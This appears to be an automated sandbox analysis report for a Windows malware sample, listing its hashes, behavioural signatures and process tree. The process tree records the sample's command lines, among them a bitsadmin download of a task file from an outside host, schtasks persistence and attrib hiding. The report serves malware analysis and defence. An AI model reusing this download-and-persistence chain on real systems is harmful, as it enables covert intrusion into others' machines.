Analysis
-
max time kernel
95s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
31-07-2022 05:35
Static task
static1
Behavioral task
behavioral1
Sample
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe
Resource
win10v2004-20220721-en
General
-
Target
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe
-
Size
102KB
-
MD5
741d79de62c0d6a30f1e84b1eb6604ee
-
SHA1
3383f9a71e614a65a151d0392a87e3dd379bf579
-
SHA256
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109
-
SHA512
8156eb0a3e8856efadce37f982408189f69126298dd5564b05d1ca6872add84490e4581e696f320a9ed1dadbd37f56429604d5efa401320829b1ed730943297c
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1204 ipconfig.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.execmd.exedescription pid process target process PID 2244 wrote to memory of 4284 2244 f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe cmd.exe PID 2244 wrote to memory of 4284 2244 f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe cmd.exe PID 2244 wrote to memory of 4284 2244 f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe cmd.exe PID 4284 wrote to memory of 1204 4284 cmd.exe ipconfig.exe PID 4284 wrote to memory of 1204 4284 cmd.exe ipconfig.exe PID 4284 wrote to memory of 1204 4284 cmd.exe ipconfig.exe PID 4284 wrote to memory of 1712 4284 cmd.exe cmd.exe PID 4284 wrote to memory of 1712 4284 cmd.exe cmd.exe PID 4284 wrote to memory of 1712 4284 cmd.exe cmd.exe PID 4284 wrote to memory of 4736 4284 cmd.exe PING.EXE PID 4284 wrote to memory of 4736 4284 cmd.exe PING.EXE PID 4284 wrote to memory of 4736 4284 cmd.exe PING.EXE PID 4284 wrote to memory of 4156 4284 cmd.exe bitsadmin.exe PID 4284 wrote to memory of 4156 4284 cmd.exe bitsadmin.exe PID 4284 wrote to memory of 4156 4284 cmd.exe bitsadmin.exe PID 4284 wrote to memory of 3884 4284 cmd.exe schtasks.exe PID 4284 wrote to memory of 3884 4284 cmd.exe schtasks.exe PID 4284 wrote to memory of 3884 4284 cmd.exe schtasks.exe PID 4284 wrote to memory of 1752 4284 cmd.exe schtasks.exe PID 4284 wrote to memory of 1752 4284 cmd.exe schtasks.exe PID 4284 wrote to memory of 1752 4284 cmd.exe schtasks.exe PID 4284 wrote to memory of 1172 4284 cmd.exe attrib.exe PID 4284 wrote to memory of 1172 4284 cmd.exe attrib.exe PID 4284 wrote to memory of 1172 4284 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe"C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\cmd.execmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\46V1IFAS.cmd" "C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /all3⤵
- Gathers network information
PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c type infile.txt3⤵PID:1712
-
-
C:\Windows\SysWOW64\PING.EXEping -a 8.8.8.8 -n 1 -43⤵
- Runs ping.exe
PID:4736
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin.exe /transfer "SyncScriptXML" /download /priority FOREGROUND http://onlineservices.fawmatt.com.au/AppStore/ALL-Domainless/syncscript.xml C:\Windows\Temp\syncscript.xml3⤵
- Download via BitsAdmin
PID:4156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "SyncScript" /F3⤵PID:3884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /TN "SyncScript" /XML C:\Windows\Temp\SyncScript.xml3⤵
- Creates scheduled task(s)
PID:1752
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\System32\Tasks\SyncScript +s +h3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1172
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD54901c736143f06b956c7d4268609ba67
SHA15e2c086ac18b82d5a5d5474a5bd26e31d733eb17
SHA256555f20bb938c7e90e1cbf0eb173aae217d06aae2fbb96b2bfefc4684439f0851
SHA512c43f67f9b528d9e76527063d78af3e38fb108a7352aa5b4658a6a25e0f77b208494b17b269681df95c3754d16ed5ca8e644f10b958d86acd520d88d742ccf997
-
Filesize
1023B
MD52fdb8b59b20f2a5270228994d0714e17
SHA1cd5e51db145be79a55c44aa076e60e4fd2ab45ec
SHA256e77bbd6510cc619f55c4119cb470fe669193c93c30b0ae5f78f602de2b6e2769
SHA5124d69a16ae45e1876bb650a969f6cf092b21873d38e171c549055b48a678cd2641fd26b55c9fd088886fe659673b1224e672614ec7d4c469b61d901e7907255dd